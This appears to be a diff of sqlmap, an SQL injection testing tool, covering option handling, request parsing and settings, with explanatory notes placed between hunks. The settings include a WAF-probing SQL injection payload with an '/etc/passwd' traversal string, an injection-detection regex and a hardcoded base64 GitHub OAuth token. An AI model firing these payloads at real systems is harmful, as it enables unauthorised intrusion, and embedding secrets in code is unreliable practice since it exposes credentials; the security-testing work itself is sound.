+                            value = "%s://%s" % (scheme, value)
+                        kb.safeReq.url = urlparse.urljoin(value, kb.safeReq.url)
+                else:
+                    break
+
+            post = None
+
+            if '\r\n\r\n' in raw:
+                post = raw[raw.find('\r\n\r\n') + 4:]
+            elif '\n\n' in raw:
+                post = raw[raw.find('\n\n') + 2:]
+
+            if post and post.strip():
+                kb.safeReq.post = post
+            else:
+                kb.safeReq.post = None
+        else:
+            errMsg = "invalid format of a safe request file"
+            raise SqlmapSyntaxException, errMsg
+    else:
+        if not re.search("^http[s]*://", conf.safeUrl):
+            if ":443/" in conf.safeUrl:
+                conf.safeUrl = "https://" + conf.safeUrl
+            else:
+                conf.safeUrl = "http://" + conf.safeUrl
+
+        if conf.safeFreq <= 0:
+            errMsg = "please provide a valid value (>0) for safe frequency (--safe-freq) while using safe visit features"
             raise SqlmapSyntaxException(errMsg)
 
 def _setPrefixSuffix():
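The new --safe-req handling above parses a raw HTTP request file: request line first, then headers until the first blank line, then an optional body. A compact standalone parser following the same steps (function and field names are mine):

    import re

    def parse_raw_request(raw):
        lines = raw.splitlines()
        match = re.search(r"\A([A-Z]+) ([^ ]+) HTTP/[0-9.]+\Z", lines[0].strip())
        if not match:
            raise ValueError("invalid format of a request file")

        method, url = match.group(1), match.group(2)
        headers = {}
        body = None

        for index, line in enumerate(lines[1:], 1):
            line = line.strip()
            if not line:   # blank line separates headers from the body
                body = "\n".join(lines[index + 1:]) or None
                break
            if ':' in line:
                key, value = line.split(':', 1)
                headers[key.strip()] = value.strip()

        return method, url, headers, body

    raw = "POST /search.php HTTP/1.1\nHost: www.example.com\nContent-Type: application/x-www-form-urlencoded\n\nq=test"
    print(parse_raw_request(raw))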
@@ -1182,6 +1258,9 @@ def _setHTTPAuthentication():
     if not conf.authType and not conf.authCred and not conf.authPrivate:
         return
 
+    if conf.authPrivate and not conf.authType:
+        conf.authType = AUTH_TYPE.PKI
+
     elif conf.authType and not conf.authCred and not conf.authPrivate:
         errMsg = "you specified the HTTP authentication type, but "
         errMsg += "did not provide the credentials"

@@ -1192,7 +1271,7 @@ def _setHTTPAuthentication():
         errMsg += "but did not provide the type"
         raise SqlmapSyntaxException(errMsg)
 
-    elif conf.authType.lower() not in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST, AUTH_TYPE.NTLM, AUTH_TYPE.PKI):
+    elif (conf.authType or "").lower() not in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST, AUTH_TYPE.NTLM, AUTH_TYPE.PKI):
         errMsg = "HTTP authentication type value must be "
         errMsg += "Basic, Digest, NTLM or PKI"
         raise SqlmapSyntaxException(errMsg)

@@ -1248,19 +1327,9 @@ def _setHTTPAuthentication():
         debugMsg = "setting the HTTP(s) authentication PEM private key"
         logger.debug(debugMsg)
 
-        key_file = os.path.expanduser(conf.authPrivate)
-        checkFile(key_file)
-        authHandler = HTTPSPKIAuthHandler(key_file)
+        _ = safeExpandUser(conf.authPrivate)
+        checkFile(_)
+        authHandler = HTTPSPKIAuthHandler(_)
 
-def _setHTTPMethod():
-    """
-    Check and set the HTTP method to perform HTTP requests through.
-    """
-
-    conf.method = HTTPMETHOD.POST if conf.data is not None else HTTPMETHOD.GET
-
-    debugMsg = "setting the HTTP method to %s" % conf.method
-    logger.debug(debugMsg)
-
 def _setHTTPExtraHeaders():
     if conf.headers:

@@ -1270,6 +1339,9 @@ def _setHTTPExtraHeaders():
         conf.headers = conf.headers.split("\n") if "\n" in conf.headers else conf.headers.split("\\n")
 
         for headerValue in conf.headers:
+            if not headerValue.strip():
+                continue
+
             if headerValue.count(':') >= 1:
                 header, value = (_.lstrip() for _ in headerValue.split(":", 1))
 

@@ -1387,6 +1459,17 @@ def _setHTTPReferer():
 
         conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.referer))
 
+def _setHTTPHost():
+    """
+    Set the HTTP Host
+    """
+
+    if conf.host:
+        debugMsg = "setting the HTTP Host header"
+        logger.debug(debugMsg)
+
+        conf.httpHeaders.append((HTTP_HEADER.HOST, conf.host))
+
 def _setHTTPCookies():
     """
     Set the HTTP Cookie header
@@ -1428,6 +1511,30 @@ def _checkDependencies():
     if conf.dependencies:
         checkDependencies()
 
+def _createTemporaryDirectory():
+    """
+    Creates temporary directory for this run.
+    """
+
+    try:
+        if not os.path.isdir(tempfile.gettempdir()):
+            os.makedirs(tempfile.gettempdir())
+    except IOError, ex:
+        errMsg = "there has been a problem while accessing "
+        errMsg += "system's temporary directory location(s) ('%s'). Please " % ex.message
+        errMsg += "make sure that there is enough disk space left. If problem persists, "
+        errMsg += "try to set environment variable 'TEMP' to a location "
+        errMsg += "writeable by the current user"
+        raise SqlmapSystemException, errMsg
+
+    if "sqlmap" not in (tempfile.tempdir or ""):
+        tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
+
+    kb.tempDir = tempfile.tempdir
+
+    if not os.path.isdir(tempfile.tempdir):
+        os.makedirs(tempfile.tempdir)
+
 def _cleanupOptions():
     """
     Cleanup configuration attributes.
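_createTemporaryDirectory() above pins tempfile.tempdir to a per-run 'sqlmap...' directory and converts access problems into a dedicated exception. A rough equivalent using only the standard library (function name and error wording are mine):

    import os
    import tempfile

    def create_run_tempdir(prefix="sqlmap"):
        try:
            if not os.path.isdir(tempfile.gettempdir()):
                os.makedirs(tempfile.gettempdir())
        except (IOError, OSError) as ex:
            raise RuntimeError("problem while accessing system's temporary directory ('%s')" % ex)

        # every later tempfile.* call in this process now lands under the new directory
        tempfile.tempdir = tempfile.mkdtemp(prefix=prefix, suffix=str(os.getpid()))
        return tempfile.tempdir

    print(create_run_tempdir())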
@@ -1445,7 +1552,7 @@ def _cleanupOptions():
 
     for key, value in conf.items():
         if value and any(key.endswith(_) for _ in ("Path", "File")):
-            conf[key] = os.path.expanduser(value)
+            conf[key] = safeExpandUser(value)
 
     if conf.testParameter:
         conf.testParameter = urldecode(conf.testParameter)

@@ -1512,8 +1619,8 @@ def _cleanupOptions():
         conf.dbms = conf.dbms.capitalize()
 
     if conf.testFilter:
-        if not any([char in conf.testFilter for char in ('.', ')', '(', ']', '[')]):
-            conf.testFilter = conf.testFilter.replace('*', '.*')
+        conf.testFilter = conf.testFilter.strip('*+')
+        conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter)
 
     if "timeSec" not in kb.explicitSettings:
         if conf.tor:

@@ -1579,6 +1686,13 @@ def _cleanupOptions():
     threadData = getCurrentThreadData()
     threadData.reset()
 
+def _dirtyPatches():
+    """
+    Place for "dirty" Python related patches
+    """
+
+    httplib._MAXLINE = 1 * 1024 * 1024  # to accept overly long result lines (e.g. SQLi results in HTTP header responses)
+
 def _purgeOutput():
     """
     Safely removes (purges) output directory.

@@ -1651,8 +1765,8 @@ def _setKnowledgeBaseAttributes(flushAll=True):
 
     kb.chars = AttribDict()
     kb.chars.delimiter = randomStr(length=6, lowercase=True)
-    kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, lowercase=True), KB_CHARS_BOUNDARY_CHAR)
-    kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, lowercase=True), KB_CHARS_BOUNDARY_CHAR)
+    kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
+    kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
     kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = ("%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, _, KB_CHARS_BOUNDARY_CHAR) for _ in randomStr(length=4, lowercase=True))
 
     kb.columnExistsChoice = None
@@ -1681,6 +1795,8 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.followSitemapRecursion = None
     kb.forcedDbms = None
     kb.forcePartialUnion = False
+    kb.forceWhere = None
+    kb.futileUnion = None
     kb.headersFp = {}
     kb.heuristicDbms = None
     kb.heuristicMode = False

@@ -1707,9 +1823,11 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.multiThreadMode = False
     kb.negativeLogic = False
     kb.nullConnection = None
+    kb.oldMsf = None
     kb.orderByColumns = None
     kb.originalCode = None
     kb.originalPage = None
+    kb.originalPageTime = None
     kb.originalTimeDelay = None
     kb.originalUrls = dict()
 

@@ -1743,15 +1861,21 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.responseTimes = []
     kb.resumeValues = True
     kb.safeCharEncode = False
+    kb.safeReq = AttribDict()
     kb.singleLogFlags = set()
     kb.reduceTests = None
+    kb.tlsSNI = None
     kb.stickyDBMS = False
     kb.stickyLevel = None
+    kb.storeCrawlingChoice = None
     kb.storeHashesChoice = None
     kb.suppressResumeInfo = False
     kb.technique = None
+    kb.tempDir = None
     kb.testMode = False
+    kb.testOnlyCustom = False
     kb.testQueryCount = 0
+    kb.testType = None
     kb.threadContinue = True
     kb.threadException = False
     kb.tableExistsChoice = None
@@ -1788,11 +1912,11 @@ def _useWizardInterface():
     message = "Please enter full target URL (-u): "
     conf.url = readInput(message, default=None)
 
-    message = "POST data (--data) [Enter for None]: "
+    message = "%s data (--data) [Enter for None]: " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST)
     conf.data = readInput(message, default=None)
 
     if not (filter(lambda _: '=' in unicode(_), (conf.url, conf.data)) or '*' in conf.url):
-        warnMsg = "no GET and/or POST parameter(s) found for testing "
+        warnMsg = "no GET and/or %s parameter(s) found for testing " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST)
         warnMsg += "(e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). "
         if not conf.crawlDepth and not conf.forms:
             warnMsg += "Will search for forms"

@@ -1888,7 +2012,13 @@ def _saveCmdline():
             config.set(family, option, value)
 
     confFP = openFile(paths.SQLMAP_CONFIG, "wb")
+
+    try:
         config.write(confFP)
+    except IOError, ex:
+        errMsg = "something went wrong while trying "
+        errMsg += "to write to the configuration INI file '%s' ('%s')" % (paths.SQLMAP_CONFIG, ex)
+        raise SqlmapSystemException(errMsg)
 
     infoMsg = "saved command line options on '%s' configuration file" % paths.SQLMAP_CONFIG
     logger.info(infoMsg)
@ -2080,6 +2210,18 @@ def _setTorSocksProxySettings():
|
||||||
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, conf.torPort or DEFAULT_TOR_SOCKS_PORT)
|
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, conf.torPort or DEFAULT_TOR_SOCKS_PORT)
|
||||||
socks.wrapmodule(urllib2)
|
socks.wrapmodule(urllib2)
|
||||||
|
|
||||||
|
def _checkWebSocket():
|
||||||
|
infoMsg = "checking for WebSocket"
|
||||||
|
logger.debug(infoMsg)
|
||||||
|
|
||||||
|
if conf.url and (conf.url.startswith("ws:/") or conf.url.startswith("wss:/")):
|
||||||
|
try:
|
||||||
|
from websocket import ABNF
|
||||||
|
except ImportError:
|
||||||
|
errMsg = "sqlmap requires third-party module 'websocket-client' "
|
||||||
|
errMsg += "in order to use WebSocket funcionality"
|
||||||
|
raise SqlmapMissingDependence(errMsg)
|
||||||
|
|
||||||
def _checkTor():
|
def _checkTor():
|
||||||
if not conf.checkTor:
|
if not conf.checkTor:
|
||||||
return
|
return
|
||||||
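Note: the added _checkWebSocket() only verifies that the optional dependency can be imported when a WebSocket URL is given. A small sketch of the same check outside sqlmap (the URL is made up; 'websocket' is the import name of the third-party websocket-client package):

def needs_websocket(url):
    # Same scheme test as the added function: ws:// or wss:// targets
    return bool(url) and (url.startswith("ws:/") or url.startswith("wss:/"))

if needs_websocket("wss://target.example/ws?id=1"):
    try:
        from websocket import ABNF  # provided by 'websocket-client'
    except ImportError:
        raise Exception("third-party module 'websocket-client' is required for WebSocket targets")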
@@ -2170,6 +2312,20 @@ def _basicOptionValidation():
 errMsg = "option '--regexp' is incompatible with switch '--null-connection'"
 raise SqlmapSyntaxException(errMsg)

+if conf.regexp:
+try:
+re.compile(conf.regexp)
+except re.error, ex:
+errMsg = "invalid regular expression '%s' ('%s')" % (conf.regexp, ex)
+raise SqlmapSyntaxException(errMsg)

+if conf.crawlExclude:
+try:
+re.compile(conf.crawlExclude)
+except re.error, ex:
+errMsg = "invalid regular expression '%s' ('%s')" % (conf.crawlExclude, ex)
+raise SqlmapSyntaxException(errMsg)

 if conf.dumpTable and conf.dumpAll:
 errMsg = "switch '--dump' is incompatible with switch '--dump-all'"
 raise SqlmapSyntaxException(errMsg)
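Note: both new blocks validate a user-supplied regular expression up front by compiling it once. The same fail-fast idea in isolation (the helper name is illustrative):

import re

def check_regex(option, value):
    # Compile once so an invalid pattern is reported before any request is sent
    try:
        re.compile(value)
    except re.error as ex:
        raise ValueError("invalid regular expression '%s' ('%s') for option '%s'" % (value, ex, option))

check_regex("--regexp", r"Welcome,\s+\w+")      # fine
# check_regex("--crawl-exclude", "([unclosed")  # would raise ValueError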
@@ -2178,7 +2334,7 @@ def _basicOptionValidation():
 errMsg = "switch '--predict-output' is incompatible with option '--threads' and switch '-o'"
 raise SqlmapSyntaxException(errMsg)

-if conf.threads > MAX_NUMBER_OF_THREADS:
+if conf.threads > MAX_NUMBER_OF_THREADS and not conf.get("skipThreadCheck"):
 errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
 raise SqlmapSyntaxException(errMsg)

@@ -2186,6 +2342,30 @@ def _basicOptionValidation():
 errMsg = "switch '--forms' requires usage of option '-u' ('--url'), '-g', '-m' or '-x'"
 raise SqlmapSyntaxException(errMsg)

+if conf.crawlExclude and not conf.crawlDepth:
+errMsg = "option '--crawl-exclude' requires usage of switch '--crawl'"
+raise SqlmapSyntaxException(errMsg)

+if conf.safePost and not conf.safeUrl:
+errMsg = "option '--safe-post' requires usage of option '--safe-url'"
+raise SqlmapSyntaxException(errMsg)

+if conf.safeFreq and not any((conf.safeUrl, conf.safeReqFile)):
+errMsg = "option '--safe-freq' requires usage of option '--safe-url' or '--safe-req'"
+raise SqlmapSyntaxException(errMsg)

+if conf.safeReqFile and any((conf.safeUrl, conf.safePost)):
+errMsg = "option '--safe-req' is incompatible with option '--safe-url' and option '--safe-post'"
+raise SqlmapSyntaxException(errMsg)

+if conf.csrfUrl and not conf.csrfToken:
+errMsg = "option '--csrf-url' requires usage of option '--csrf-token'"
+raise SqlmapSyntaxException(errMsg)

+if conf.csrfToken and conf.threads > 1:
+errMsg = "option '--csrf-url' is incompatible with option '--threads'"
+raise SqlmapSyntaxException(errMsg)

 if conf.requestFile and conf.url and conf.url != DUMMY_URL:
 errMsg = "option '-r' is incompatible with option '-u' ('--url')"
 raise SqlmapSyntaxException(errMsg)

@@ -2214,8 +2394,8 @@ def _basicOptionValidation():
 errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)"
 raise SqlmapSyntaxException(errMsg)

-if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort > 0):
-errMsg = "value for option '--tor-port' must be a positive integer"
+if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535):
+errMsg = "value for option '--tor-port' must be in range 0-65535"
 raise SqlmapSyntaxException(errMsg)

 if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True):
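Note: the relaxed --tor-port check now accepts any valid TCP port number (0-65535) instead of only positive integers. A one-line helper with the same semantics (illustrative, not sqlmap code):

def valid_tor_port(value):
    # Any TCP port number in range is acceptable
    return isinstance(value, int) and 0 <= value <= 65535

assert valid_tor_port(9050) and valid_tor_port(0)
assert not valid_tor_port(-1) and not valid_tor_port(70000)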
@@ -2280,7 +2460,7 @@ def _resolveCrossReferences()
 lib.controller.checks.setVerbosity = setVerbosity

 def initOptions(inputOptions=AttribDict(), overrideOptions=False):
-if not inputOptions.disableColoring:
+if IS_WIN:
 coloramainit()

 _setConfAttributes()

@@ -2298,8 +2478,10 @@ def init():
 _saveCmdline()
 _setRequestFromFile()
 _cleanupOptions()
+_dirtyPatches()
 _purgeOutput()
 _checkDependencies()
+_createTemporaryDirectory()
 _basicOptionValidation()
 _setProxyList()
 _setTorProxySettings()

@@ -2310,6 +2492,7 @@ def init():
 _setWafFunctions()
 _setTrafficOutputFP()
 _resolveCrossReferences()
+_checkWebSocket()

 parseTargetUrl()
 parseTargetDirect()

@@ -2319,12 +2502,12 @@ def init():
 _setHTTPExtraHeaders()
 _setHTTPCookies()
 _setHTTPReferer()
+_setHTTPHost()
 _setHTTPUserAgent()
-_setHTTPMethod()
 _setHTTPAuthentication()
 _setHTTPProxy()
 _setDNSCache()
-_setSafeUrl()
+_setSafeVisit()
 _setGoogleDorking()
 _setBulkMultipleTargets()
 _setSitemapTargets()

@@ -2340,6 +2523,7 @@ def init():
 _setWriteFile()
 _setMetasploit()
 _setDBMSAuthentication()
+loadBoundaries()
 loadPayloads()
 _setPrefixSuffix()
 update()
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -23,6 +23,7 @@ optDict = {
 },

 "Request": {
+"method": "string",
 "data": "string",
 "paramDel": "string",
 "cookie": "string",

@@ -49,9 +50,13 @@ optDict = {
 "timeout": "float",
 "retries": "integer",
 "rParam": "string",
-"safUrl": "string",
-"saFreq": "integer",
+"safeUrl": "string",
+"safePost": "string",
+"safeReqFile": "string",
+"safeFreq": "integer",
 "skipUrlEncode": "boolean",
+"csrfToken": "string",
+"csrfUrl": "string",
 "forceSSL": "boolean",
 "hpp": "boolean",
 "evalCode": "string",

@@ -68,6 +73,7 @@ optDict = {
 "Injection": {
 "testParameter": "string",
 "skip": "string",
+"skipStatic": "boolean",
 "dbms": "string",
 "dbmsCred": "string",
 "os": "string",

@@ -185,6 +191,7 @@ optDict = {
 "batch": "boolean",
 "charset": "string",
 "crawlDepth": "integer",
+"crawlExclude": "string",
 "csvDel": "string",
 "dumpFormat": "string",
 "eta": "boolean",

@@ -202,16 +209,15 @@ optDict = {
 },

 "Miscellaneous": {
-"mnemonics": "string",
 "alert": "string",
 "answers": "string",
 "beep": "boolean",
-"checkWaf": "boolean",
 "cleanup": "boolean",
 "dependencies": "boolean",
 "disableColoring": "boolean",
 "googlePage": "integer",
 "mobile": "boolean",
+"offline": "boolean",
 "pageRank": "boolean",
 "purgeOutput": "boolean",
 "smart": "boolean",
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -70,7 +70,7 @@ class Replication(object):
 try:
 self.parent.cursor.execute(sql, parameters)
 except sqlite3.OperationalError, ex:
-errMsg = "problem occurred ('%s') while accessing sqlite database " % ex
+errMsg = "problem occurred ('%s') while accessing sqlite database " % unicode(ex)
 errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath
 errMsg += "it's not used by some other program"
 raise SqlmapGenericException(errMsg)

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -1,12 +1,11 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

 import os
-import random
 import re
 import subprocess
 import string

@@ -26,20 +25,23 @@ DESCRIPTION = "automatic SQL injection and database takeover tool"
 SITE = "http://sqlmap.org"
 ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
 GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
-ML = "sqlmap-users@lists.sourceforge.net"
+GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"

 # colorful banner
 BANNER = """\033[01;33m _
 ___ ___| |_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
 |_ -| . | | | .'| . |
 |___|_ |_|_|_|_|__,| _|
-|_| |_| \033[0m\033[4m%s\033[0m\n
+|_| |_| \033[0m\033[4;37m%s\033[0m\n
 """ % ((31 + hash(REVISION) % 6) if REVISION else 30, VERSION_STRING.split('/')[-1], SITE)

 # Minimum distance of ratio from kb.matchRatio to result in True
 DIFF_TOLERANCE = 0.05
 CONSTANT_RATIO = 0.9

+# Ratio used in heuristic check for WAF/IDS/IPS protected targets
+IDS_WAF_CHECK_RATIO = 0.5

 # Lower and upper values for match ratio in case of stable page
 LOWER_RATIO_BOUND = 0.02
 UPPER_RATIO_BOUND = 0.98

@@ -47,6 +49,7 @@ UPPER_RATIO_BOUND = 0.98
 # Markers for special cases when parameter values contain html encoded characters
 PARAMETER_AMP_MARKER = "__AMP__"
 PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__"
+BOUNDARY_BACKSLASH_MARKER = "__BACKSLASH__"
 PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__"
 PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__"
 URI_QUESTION_MARKER = "__QUESTION_MARK__"

@@ -78,6 +81,9 @@ TEXT_TAG_REGEX = r"(?si)<(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|fo
 # Regular expression used for recognition of IP addresses
 IP_ADDRESS_REGEX = r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"

+# Regular expression used for recognition of generic "your ip has been blocked" messages
+BLOCKED_IP_REGEX = r"(?i)(\A|\b)ip\b.*\b(banned|blocked|block list|firewall)"

 # Dumping characters used in GROUP_CONCAT MySQL technique
 CONCAT_ROW_DELIMITER = ','
 CONCAT_VALUE_DELIMITER = '|'
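Note: a quick demonstration of what the new BLOCKED_IP_REGEX is meant to catch (the sample response texts are made up):

import re

BLOCKED_IP_REGEX = r"(?i)(\A|\b)ip\b.*\b(banned|blocked|block list|firewall)"

print(bool(re.search(BLOCKED_IP_REGEX, "Your IP address has been blocked by the firewall")))  # True
print(bool(re.search(BLOCKED_IP_REGEX, "Welcome back, admin")))                               # False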
@@ -139,10 +145,10 @@ INFERENCE_EQUALS_CHAR = "="
 # Character used for operation "not-equals" in inference
 INFERENCE_NOT_EQUALS_CHAR = "!="

-# String used for representation of unknown dbms
+# String used for representation of unknown DBMS
 UNKNOWN_DBMS = "Unknown"

-# String used for representation of unknown dbms version
+# String used for representation of unknown DBMS version
 UNKNOWN_DBMS_VERSION = "Unknown"

 # Dynamicity mark length used in dynamicity removal engine

@@ -201,10 +207,15 @@ DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) f
 SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES
 SUPPORTED_OS = ("linux", "windows")

+DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES))

 USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
 REFERER_ALIASES = ("ref", "referer", "referrer")
 HOST_ALIASES = ("host",)

+# Names that can't be used to name files on Windows OS
+WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9")

 # Items displayed in basic help (-h) output
 BASIC_HELP_ITEMS = (
 "url",

@@ -237,6 +248,7 @@ BASIC_HELP_ITEMS = (
 "checkTor",
 "flushSession",
 "tor",
+"sqlmapShell",
 "wizard",
 )

@@ -261,7 +273,7 @@ ERROR_PARSING_REGEXES = (
 META_CHARSET_REGEX = r'(?si)<head>.*<meta[^>]+charset="?(?P<result>[^"> ]+).*</head>'

 # Regular expression used for parsing refresh info from meta html headers
-META_REFRESH_REGEX = r'(?si)<head>.*<meta http-equiv="?refresh"?[^>]+content="?[^">]+url=["\']?(?P<result>[^\'">]+).*</head>'
+META_REFRESH_REGEX = r'(?si)<head>(?!.*?<noscript.*?</head).*?<meta http-equiv="?refresh"?[^>]+content="?[^">]+url=["\']?(?P<result>[^\'">]+).*</head>'

 # Regular expression used for parsing empty fields in tested form data
 EMPTY_FORM_FIELDS_REGEX = r'(&|\A)(?P<result>[^=]+=(&|\Z))'

@@ -405,7 +417,7 @@ ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
 DUMMY_SQL_INJECTION_CHARS = ";()'"

 # Simple check against dummy users
-DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\A-\d+\Z"
+DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"

 # Extensions skipped by crawler
 CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jpeg", "image", "jar", "tif", "bmp", "war", "ear", "mpg", "mpeg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "mkv", "bin", "iso", "tar", "png", "pdf", "ps", "wav", "mp3", "mp4", "au", "aiff", "aac", "zip", "rar", "7z", "gz", "flv", "mov", "doc", "docx", "xls", "dot", "dotx", "xlt", "xlsx", "ppt", "pps", "pptx")

@@ -420,7 +432,7 @@ BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)"
 BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"

 # Payload used for checking of existence of IDS/WAF (dummier the better)
-IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1"
+IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd"

 # Vectors used for provoking specific WAF/IDS/IPS behavior(s)
 WAF_ATTACK_VECTORS = (

@@ -434,8 +446,8 @@ WAF_ATTACK_VECTORS = (
 # Used for status representation in dictionary attack phase
 ROTATING_CHARS = ('\\', '|', '|', '/', '-')

-# Chunk length (in items) used by BigArray objects (only last chunk and cached one are held in memory)
-BIGARRAY_CHUNK_LENGTH = 4096
+# Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory)
+BIGARRAY_CHUNK_SIZE = 1024 * 1024

 # Only console display last n table rows
 TRIM_STDOUT_DUMP_SIZE = 256
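Note: the BigArray constant changes from a fixed item count (4096 items per chunk) to an approximate byte budget per chunk (1 MiB). One hedged way to read that change, shown as a toy calculation only (this is not how BigArray itself is implemented):

import sys

BIGARRAY_CHUNK_SIZE = 1024 * 1024  # byte budget per on-disk chunk

def approximate_capacity(sample_item):
    # Roughly how many items of this size would fit into a single chunk
    return max(1, BIGARRAY_CHUNK_SIZE // sys.getsizeof(sample_item))

print(approximate_capacity(u"john.doe@example.com"))  # varies with item size and Python build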
@@ -470,6 +482,9 @@ DEFAULT_COOKIE_DELIMITER = ';'
 # Unix timestamp used for forcing cookie expiration when provided with --load-cookies
 FORCE_COOKIE_EXPIRATION_TIME = "9999999999"

+# Github OAuth token used for creating an automatic Issue for unhandled exceptions
+GITHUB_REPORT_OAUTH_TOKEN = "YzQzM2M2YzgzMDExN2I5ZDMyYjAzNTIzODIwZDA2MDFmMmVjODI1Ng=="

 # Skip unforced HashDB flush requests below the threshold number of cached items
 HASHDB_FLUSH_THRESHOLD = 32

